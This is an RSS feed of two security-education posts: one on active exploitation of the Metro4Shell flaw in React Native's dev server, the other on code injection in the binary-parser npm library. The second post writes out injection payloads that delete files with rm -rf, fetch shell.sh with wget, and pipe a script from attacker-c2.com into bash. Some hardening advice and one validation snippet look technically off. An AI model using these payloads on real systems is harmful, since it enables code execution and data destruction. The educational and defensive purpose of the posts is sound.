Open Source – Cyber Pulse Academy https://www.cyberpulseacademy.com Wed, 18 Feb 2026 14:35:55 +0000 en-US hourly 1 https://files.servewebsite.com/2023/07/ea224bb3-generated-image-1763134673008-enlarge.png Open Source – Cyber Pulse Academy https://www.cyberpulseacademy.com 32 32 Metro4Shell Under Fire: How Attackers Exploit CVE-2025-11953 in React Native Tooling https://www.cyberpulseacademy.com/metro4shell-rce-exploitation-guide/ https://www.cyberpulseacademy.com/metro4shell-rce-exploitation-guide/#respond Tue, 03 Feb 2026 01:33:40 +0000 https://www.cyberpulseacademy.com/?p=13272

Metro4Shell Under Fire: How Attackers Exploit CVE-2025-11953 in React Native Tooling

📋 Executive Summary: Why Metro4Shell Matters

On December 21, 2025, threat actors began actively exploiting a critical vulnerability in the Metro development server, part of the popular @react-native-community/cli npm package. Tracked as CVE-2025-11953 and dubbed “Metro4Shell”, this flaw allows remote unauthenticated attackers to execute arbitrary commands on any machine running the development server. With a CVSS score of 9.8 (Critical), the Metro4Shell RCE exploitation has been observed delivering Rust-based backdoors, disabling Microsoft Defender, and establishing persistent command & control. The U.S. CISA has already added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating fixes by February 26, 2026.


This post provides a complete, beginner-friendly breakdown of the Metro4Shell attack, maps it to MITRE ATT&CK techniques, and offers a clear defender’s roadmap. Whether you're a developer using React Native or a security professional, understanding this supply-chain style attack on development infrastructure is crucial.


📑 Table of Contents

🔍 1. What is Metro4Shell? A Closer Look at CVE-2025-11953

React Native developers use the Metro bundler (part of @react-native-community/cli) as a local development server. It bundles JavaScript and assets, and typically runs on localhost:8081. However, misconfigurations or exposing this server to a network can turn it into a critical attack vector.


CVE-2025-11953 (Metro4Shell) is an unauthenticated remote code execution flaw in versions of the Metro server prior to the patch. Discovered by JFrog in November 2025, the vulnerability allows an attacker to send a crafted HTTP request that executes arbitrary OS commands on the host. It abuses the server’s lack of input validation in certain endpoints designed for development-time features.


Metro4Shell RCE exploitation diagram showing attack from internet to exposed dev server

Technical essence

While the full exploit details are withheld to prevent script-kiddie use, the core issue lies in the Metro server’s handling of multi-part requests or specific URL parameters that are passed to a shell without sanitization. In vulnerable configurations, an HTTP GET or POST can trigger command injection with the privileges of the Node.js process.

Conceptual example (not actual exploit):
GET /__open-stack-frame?file=C:/Windows/System32/calc.exe HTTP/1.1
Host: 192.168.1.100:8081

// If the server naively passes the 'file' parameter to a shell, arbitrary commands can be injected.

🌐 2. Real-World Attack Scenario: From Exploit to Backdoor

According to VulnCheck’s honeypot telemetry, the Metro4Shell RCE exploitation observed in the wild follows a multi-stage pattern. Below is a step-by-step reconstruction based on the IP addresses and payloads captured.

Step 1: Initial Exploit (CVE-2025-11953)

Attackers scan for exposed Metro servers on ports 8081, 8082, etc. Using a crafted request (often containing encoded PowerShell), they gain unauthenticated RCE. The observed attacking IPs included: 5.109.182.231, 223.6.249.141, and 134.209.69.155.

Step 2: PowerShell Payload Delivery

The exploit injects a Base64-encoded PowerShell script. Once decoded, the script performs two key actions:

  • Defender Exclusion: Adds the current working directory and C:\Users\<Username>\AppData\Local\Temp to Microsoft Defender Antivirus exclusions (defense evasion).
  • TCP Connection: Establishes a raw TCP connection to 8.218.43.248:60124.

Step 3: Download & Execute Rust Binary

Through the TCP tunnel, the victim downloads a binary payload written in Rust. This binary includes anti-analysis checks (e.g., debugger detection, sandbox evasion) and ultimately provides persistent backdoor access. The consistency of payloads over weeks confirms this is operational use, not mere probing.


Metro4Shell attack chain flow diagram showing exploit, defense evasion, and backdoor installation

⚔️ 3. MITRE ATT&CK Techniques in the Wild

Understanding the adversary behavior through the MITRE framework helps defenders build better detections. Here’s how the Metro4Shell attack maps to tactics and techniques:

Tactic Technique ID Technique Name Observed Use
Initial Access T1190 Exploit Public-Facing Application Exploiting CVE-2025-11953 in exposed Metro dev server.
Execution T1059.001 Command and Scripting Interpreter: PowerShell Base64-encoded PowerShell script executed post-exploit.
Defense Evasion T1562.001 Disable or Modify Tools: Antivirus Adding Defender exclusions for working dir and Temp.
Command and Control T1573.001 Encrypted Channel: Symmetric Cryptography Raw TCP connection (though not encrypted, the Rust binary may use custom encryption; raw socket for C2).
Ingress Tool Transfer T1105 Ingress Tool Transfer Downloading Rust-based binary from attacker IP.

🛡️ 4. Red Team vs Blue Team: Two Perspectives

🔴 Red Team (Attacker) View

  • Target: Exposed developer servers with default configs.
  • Weaponization: Use public PoC for CVE-2025-11953.
  • Execution: Inject PowerShell one-liner to drop payload.
  • Persistence: Rust backdoor with anti-analysis.
  • Goal: Long-term access, possibly for supply-chain compromise.

🔵 Blue Team (Defender) View

  • Harden: Never expose Metro server to network; bind to localhost only.
  • Detect: Monitor for suspicious requests to port 8081, especially with cmdline chars.
  • Respond: Block outbound connections to unknown IPs (like 8.218.43.248).
  • Patch: Update @react-native-community/cli to patched version.

🛠️ 5. Step-by-Step Guide for Defenders

✅ Step 1: Identify Exposure

Run a network scan to check if any developer machines have port 8081 (or custom Metro port) listening on 0.0.0.0. Use: netstat -an | findstr :8081 (Windows) or ss -tuln | grep 8081 (Linux).

✅ Step 2: Patch Immediately

Update @react-native-community/cli to the latest version (>= 15.1.0, which includes the fix). Run: npm update @react-native-community/cli. Check your lockfile.

✅ Step 3: Harden Configuration

Ensure Metro only binds to localhost. In your metro.config.js, set server: { port: 8081, enableDevServer: true, bindAddress: '127.0.0.1' }. Also, never expose the dev server via ngrok or cloud without authentication.

✅ Step 4: Monitor for IOCs

Check logs for requests to /__open-stack-frame or similar endpoints with encoded payloads. Also monitor outbound connections to the known malicious IPs: 8.218.43.248, 5.109.182.231, 223.6.249.141, 134.209.69.155.

✅ Step 5: Review CISA KEV Alert

Federal agencies must patch by February 26, 2026. All organizations should treat this as an active threat. Reference: CISA KEV Catalog.

⚠️ 6. Common Mistakes & Best Practices

❌ Frequent Errors

  • Exposing dev servers to the internet for “easy testing” via cloud or port forwarding.
  • Assuming localhost-only is default – Metro may bind to all interfaces in some setups.
  • Delaying patches because “it’s only a dev tool”. Attackers love these gaps.
  • Ignoring outbound alerts from developer machines – they are often trusted.

✅ Defensive Best Practices

  • Bind to 127.0.0.1 – explicitly set bindAddress in Metro config.
  • Use VPN or SSH tunnels if remote access is needed.
  • Regularly update npm packages, especially @react-native-community/cli.
  • Deploy endpoint detection on developer workstations to catch anomalous processes like PowerShell launching from Node.js.
  • Outbound firewall rules to block connections to known malicious IPs and restrict unexpected outbound traffic.

🏗️ 7. Implementation Framework: Securing Development Environments

To systematically protect against attacks like Metro4Shell, integrate these controls into your development lifecycle:

Phase Action Tooling / Check
Code Dependency scanning npm audit, Snyk, or GitHub Dependabot to flag vulnerable @react-native-community/cli.
Build Static analysis of configs Check that metro.config.js binds to localhost; use linters.
Deploy Network policies Developers should be on isolated VLANs; egress filtering.
Runtime EDR / logging Monitor for suspicious process trees: node.exe spawning powershell.exe.
Response Incident playbook Include steps for dev server compromise: isolate machine, rotate secrets, check for backdoors.

❓ 8. Frequently Asked Questions

Q: Am I vulnerable if I use React Native but don't run Metro?

A: Metro is integral to the development server; if you ever run npm start or react-native start, you're running Metro. Check if it's bound to localhost only.

Q: What versions are affected?

A: According to JFrog's disclosure, versions of @react-native-community/cli prior to 15.1.0 (or specific backported patches) are vulnerable. Always update to the latest.

Q: Can this be exploited if Metro is only accessible on localhost?

A: No, the attacker needs network access to the Metro port. However, if an attacker already has code execution on your machine, they could pivot to localhost. But the primary vector is remote exploitation of exposed servers.

Q: Does CISA's KEV inclusion mean federal agencies must act?

A: Yes, for FCEB agencies, it's binding. For private sector, it's a strong signal that this is a top priority threat.

🔑 9. Key Takeaways

  • Metro4Shell (CVE-2025-11953) is a critical RCE in React Native's dev server, actively exploited since December 2025.
  • Attackers use it to deploy Rust-based backdoors, disable Defender, and establish C2.
  • MITRE ATT&CK techniques include T1190, T1059.001, T1562.001, and T1105.
  • Immediate actions: update the CLI, bind Metro to 127.0.0.1, and monitor for IOCs.
  • Development servers are production assets, secure them accordingly.

Call to Action: 🛡️ Review your React Native projects today. Run npm ls @react-native-community/cli to check versions. If you need help crafting detection rules or securing your CI/CD pipeline, contact our team or explore our developer security workshop.

© Cyber Pulse Academy. This content is provided for educational purposes only.

Always consult with security professionals for organization-specific guidance.

CISA KEV Catalog@react-native-community/cli on npmVulnCheck AnalysisJFrog SecurityReact Native Security

Latest News

  • All Posts
  • News
Load More

End of Content.

DONATE · SUPPORT

We keep threat intelligence free. No paywalls, no ads. Your donation directly funds server infrastructure, research, and tools. Every contribution - no matter the size - makes this platform sustainable.
100% of your support goes to the platform. No corporate sponsors, just the community.
ROOT::DONATE
Previous Post
Next Post

Leave a Comment

Your email address will not be published. Required fields are marked *



]]> https://www.cyberpulseacademy.com/metro4shell-rce-exploitation-guide/feed/ 0 CERT/CC warns binary-parser Bug Enables Node.js Privilege Escalation https://www.cyberpulseacademy.com/binary-parser-vulnerability-guide/ https://www.cyberpulseacademy.com/binary-parser-vulnerability-guide/#respond Wed, 21 Jan 2026 01:19:47 +0000 https://www.cyberpulseacademy.com/?p=10905

CERT/CC warns binary-parser Bug Enables Node.js Privilege Escalation

A Critical Guide to Parser Poisoning & Code Execution Explained Simply

The discovery of CVE-2026-1245, a critical vulnerability in the widely-used binary-parser npm library, sent ripples through the Node.js community in early 2026. This flaw, nicknamed "Parser Poisoning," isn't just another bug; it's a stark lesson in how the pursuit of performance can inadvertently open doors for attackers to execute arbitrary code. Affecting versions prior to 2.3.0, this binary-parser vulnerability highlights a critical intersection of dynamic code generation and improper input validation. For cybersecurity professionals, students, and developers, understanding this attack vector is essential for securing modern applications. This guide will break down exactly how the exploit works, map it to the MITRE ATT&CK framework, and provide a clear, actionable path to defend your systems.


Table of Contents

Executive Summary: The Core of the binary-parser vulnerability

The binary-parser library is a popular tool that allows Node.js developers to efficiently parse complex binary data (like file formats or network packets) by defining a schema. To achieve high speed, it uses a dangerous optimization: it dynamically generates the parsing function at runtime by constructing JavaScript code as a string and then compiling it using the JavaScript Function constructor.


The vulnerability (CVE-2026-1245, CVSS 6.5) exists because the library did not sanitize user input that was fed into this code-generation process. If an application dynamically creates a parser schema using untrusted data, for example, a field name from an uploaded file, an attacker can inject malicious JavaScript statements. These statements become part of the generated function and execute with the full privileges of the Node.js process, leading to remote code execution (RCE). The fix in version 2.3.0 involves proper validation and sanitization of all input used in schema definitions.


White Label 1624e569 86 1

How Parser Poisoning Works: A Technical Breakdown

To truly grasp this binary-parser vulnerability, we need to look under the hood. The library's performance comes from avoiding a slow, interpretive parser. Instead, it builds a custom, optimized function for each schema.

The Dynamic Code Generation Sink

When you define a parser, binary-parser internally builds a string of JavaScript source code. For a simple schema defining a 16-bit integer, it might generate a string like:

// Internal code generation (simplified)
const codeString = ` 
    return function(buffer) {
        const vars = {};
        vars.myField = buffer.readUInt16BE(0); // Reading the integer
        return vars;
    }
`;
const parsingFunction = new Function('buffer', codeString); // COMPILATION HAPPENS HERE

The vulnerability occurs because user-controlled input, like a field name or an encoding type, is directly interpolated into this code string. There is no validation to check if the input contains malicious code.

The Injection Point

Consider an application that lets users define a field name for parsed data (e.g., from a user-uploaded binary template). A normal input would be "timestamp". An attacker would provide:

"timestamp; console.log(require('child_process').execSync('rm -rf /tmp/*')); //"

This malicious input gets interpolated directly:

// Generated code becomes poisoned
const poisonedCodeString = ` 
    return function(buffer) {
        const vars = {};
        vars.timestamp; console.log(require('child_process').execSync('rm -rf /tmp/*')); // = buffer.readUInt16BE(0);
        return vars;
    }
`;
// The `new Function()` compiles and executes this, running the shell command!

The semicolon ends the intended statement, and the attacker's code is executed in the context of the Node.js process. This is a classic Code Injection flaw, made possible by the unsafe use of new Function() with unsanitized input.

Mapping to MITRE ATT&CK: Tactic, Technique, and Procedure

Understanding this binary-parser vulnerability within a structured framework like MITRE ATT&CK helps defenders anticipate and detect related attacks. This flaw serves as a perfect vehicle for several techniques.

MITRE ATT&CK Tactic Technique (ID & Name) How It Applies to Parser Poisoning
Initial Access T1190 - Exploit Public-Facing Application The attacker exploits the vulnerable Node.js application (using binary-parser) over the network to gain initial foothold.
Execution T1059.007 - Command and Scripting Interpreter: JavaScript The core of the exploit. The injected payload is arbitrary JavaScript code, executed via the Node.js interpreter within the application's context.
Persistence / Defense Evasion T1505.003 - Server Software Component: Web Shell An attacker could use the code execution to deploy a web shell on the server, ensuring continued access.
Impact T1496 - Resource Hijacking Could be used to run cryptocurrency miners or other resource-intensive malicious code on compromised servers.

Red Team vs. Blue Team: Attack and Defense Perspectives

Red Team (Attack) View

  • Reconnaissance: Scan for applications using binary-parser (e.g., by checking package.json files in exposed source repos or error messages).
  • Weaponization: Craft a malicious payload tailored to the application's context. Example: "field; require('child_process').exec('wget http://attacker.com/shell.sh -O /tmp/shell.sh'); //".
  • Exploitation: Identify any user-input field that influences parser schema creation (file uploads, API parameters, config imports) and inject the payload.
  • Objectives: Use the initial code execution to establish a reverse shell, escalate privileges, and move laterally within the environment.

Blue Team (Defense) View

  • Detection: Monitor for abnormal Node.js process behavior (spawning child processes like sh, bash, curl, wget). Use IDS/IPS rules to flag network requests containing suspicious JavaScript syntax in parameters.
  • Prevention: Immediately upgrade binary-parser to v2.3.0+. Implement strict input validation and allow-listing for any data used in dynamic code contexts. Run the Node.js process with the least necessary privileges.
  • Hardening: Utilize the --disable-node-options flag or similar to restrict dangerous Node.js modules (like child_process) in production if not needed. Employ security linters (Semgrep, CodeQL) to find similar patterns.
  • Incident Response: Have a playbook ready for suspected code injection. Isolate the affected system, analyze logs for the injection payload, and rotate all credentials that were accessible to the compromised process.

Real-World Scenario & Use Cases

This isn't a theoretical flaw. The binary-parser vulnerability is exploitable in any application that builds schemas dynamically from external sources.

  • IoT Device Management Portal: A portal accepts firmware uploads from vendors and uses binary-parser to read metadata (version, size) from the binary header. An attacker uploads a maliciously crafted firmware file, poisoning the parser to execute code on the management server.
  • Financial Data Processor: A service parses custom binary stock ticker data from different exchanges. The exchange identifier field in the data stream is used to select a parsing schema. By poisoning this field, an attacker could compromise the data processing pipeline.
  • Game Server: A multiplayer game server uses binary-parser to decode complex binary packets from clients. If packet headers are parsed using a dynamically configured schema, a malicious client could take over the game server.

Step-by-Step: Exploiting the Vulnerability (For Educational Purposes)

This walkthrough illustrates the attack chain to foster defensive understanding. Only perform this in a controlled, authorized lab environment.

Step 1: Identify the Target Application

Find an application using a vulnerable version (< 2.3.0) of binary-parser. Look for features where file format, data structure, or parser options can be influenced by the user (e.g., "Upload Custom Data Template").

Step 2: Craft the Malicious Payload

Design a payload that breaks out of the intended variable assignment and executes a command. A simple proof-of-concept to confirm execution might be:

"fieldName; console.log('PWNED'); process.exit(1); //"

This would print "PWNED" to the server logs and crash the process, confirming the injection.

Step 3: Deliver the Payload

Submit the payload through the identified input vector. This could be via a file upload, a POST request parameter, or a WebSocket message, wherever the application passes untrusted data to binary-parser's schema definition.

Step 4: Achieve Code Execution

If successful, the attacker's code runs. A more dangerous payload could fetch and execute a secondary script from an attacker-controlled server, establishing a persistent backdoor.

"x; const { exec } = require('child_process'); exec('curl http://attacker-c2.com/script.sh | bash'); //"

Common Mistakes & Best Practices

Common Mistakes

  • Assuming dependencies are safe: Blindly trusting all open-source libraries without monitoring for vulnerabilities.
  • Using dynamic code generation unnecessarily: Employing eval() or new Function() for performance without considering the massive security risk.
  • Lack of input validation: Passing user or external data directly into sensitive contexts without sanitization or allow-listing.
  • Over-privileged processes: Running Node.js applications as root or high-privilege users, amplifying the impact of any breach.

Best Practices

  • Patch aggressively: Immediately update binary-parser to v2.3.0+ and implement an automated dependency update process.
  • Validate and sanitize: Implement strict, context-specific input validation. For fields used in code generation, use an allow-list of permitted characters.
  • Adopt safer alternatives: Where possible, use libraries that perform parsing without dynamic code generation. For binary-parser, ensure schemas are static and hard-coded.
  • Apply the principle of least privilege: Run Node.js applications with minimal system permissions and use security flags (e.g., --no-node-snapshot for some isolation).

Implementation Framework for Developers

Here’s a concrete framework to secure your use of binary-parser or similar libraries.

  1. Inventory and Assess:
    • Run npm list binary-parser to check the version.
    • Search your codebase for require('binary-parser') or import statements.
    • Identify every place a parser is created. Is the schema static (hard-coded object) or dynamic (built from variables)?
  2. Remediate Immediately:
    • Update: npm update binary-parser or set version to "^2.3.0" in package.json.
    • For any dynamic schema, refactor to use static schemas if possible. If dynamic behavior is essential, implement a strict allow-list validation function for all user inputs.
  3. Implement Defensive Coding: 
    // BAD: Direct interpolation of user input
const parser = Parser.start().string("filename", { length: userProvidedLength });

// GOOD: Validate and sanitize first
const sanitizedLength = validateAndSanitizeLength(userProvidedLength); // Throws if invalid
const parser = Parser.start().string("filename", { length: sanitizedLength });

// Example validation function
function validateAndSanitizeLength(input) {
    const len = parseInt(input, 10);
    if (isNaN(len) || len  1024) { // Define sensible bounds
        throw new Error("Invalid length parameter");
    }
    return len;
}
  4. Monitor and Harden:
    • Integrate security tools like SonarJS or Semgrep into your CI/CD to catch unsafe patterns.
    • Run applications in containers with limited capabilities and as a non-root user.

Visual Breakdown: The Attack Flow


White Label 46d21728 86 2

Frequently Asked Questions (FAQ)

Q: Is my application vulnerable if I only use static, hard-coded parser schemas?

A: No. The advisory from CERT/CC and Alma Security explicitly states that applications using only static schemas are not affected. The vulnerability is triggered only when untrusted input is used to dynamically construct the parser definition (e.g., field names, lengths, types).

Q: What's the CVSS score, and what does it mean?

A: CVE-2026-1245 has a CVSS v3.1 score of 6.5 (Medium severity). The score reflects that the attack requires some specific conditions (dynamic schema from untrusted input) but can lead to full compromise of the application's process. It's a high-impact flaw with a medium attack complexity.

Q: Beyond updating, how can I find similar vulnerabilities in my code?

A: Use static application security testing (SAST) tools. For Node.js, GitHub CodeQL has queries to detect instances of new Function() or eval() with user-controlled input. Also, review the CWE-94: Improper Control of Generation of Code ('Code Injection') page to understand the root cause.

Q: Are other libraries vulnerable to this type of issue?

A: Absolutely. Any library or custom code that uses eval(), new Function(), setTimeout() with strings, or vm.runInContext() with unsanitized input is at risk. This binary-parser vulnerability is a specific case of a much broader class of Code Injection flaws.

Key Takeaways

  • The binary-parser vulnerability (CVE-2026-1245) is a Code Injection flaw that allows Remote Code Execution in Node.js applications that dynamically generate parser schemas from untrusted input.
  • The root cause is the unsafe interpolation of user input into a string that is compiled with the JavaScript Function constructor, a common performance optimization with catastrophic security implications if mishandled.
  • This exploit maps directly to MITRE ATT&CK techniques, primarily T1059.007 (JavaScript Execution), and can serve as initial access for a full system compromise.
  • Immediate patching to version 2.3.0+ is the primary mitigation. For essential dynamic features, strict input validation and allow-listing are non-negotiable.
  • This incident underscores the critical need for Software Composition Analysis (SCA) and SAST tools in the development lifecycle to catch dangerous patterns in both dependencies and custom code.

Call to Action

Don't let your application be the next victim of Parser Poisoning. Your action plan is straightforward:

  1. Check: Run a dependency scan in your Node.js projects now. Identify any instance of binary-parser below version 2.3.0.
  2. Patch: Update the package immediately. Use npm update binary-parser or manually set the version in your package.json file.
  3. Audit: Review your code. Are you passing any user-supplied parameters (from APIs, files, databases) into the parser schema? If yes, refactor to static schemas or implement robust validation.
  4. Learn: Deepen your understanding of secure coding. Bookmark the OWASP Code Injection page and the CWE-94 entry.
  5. Share: Inform your team. Forward this guide to your fellow developers and DevOps engineers. Collective awareness is the first layer of defense.

By understanding and acting on this vulnerability, you're not just fixing a bug, you're building a more resilient and secure software development practice.

© 2026 Cyber Pulse Academy. This content is provided for educational purposes only.

Always consult with security professionals for organization-specific guidance.

Leave a Comment

Your email address will not be published. Required fields are marked *



]]> https://www.cyberpulseacademy.com/binary-parser-vulnerability-guide/feed/ 0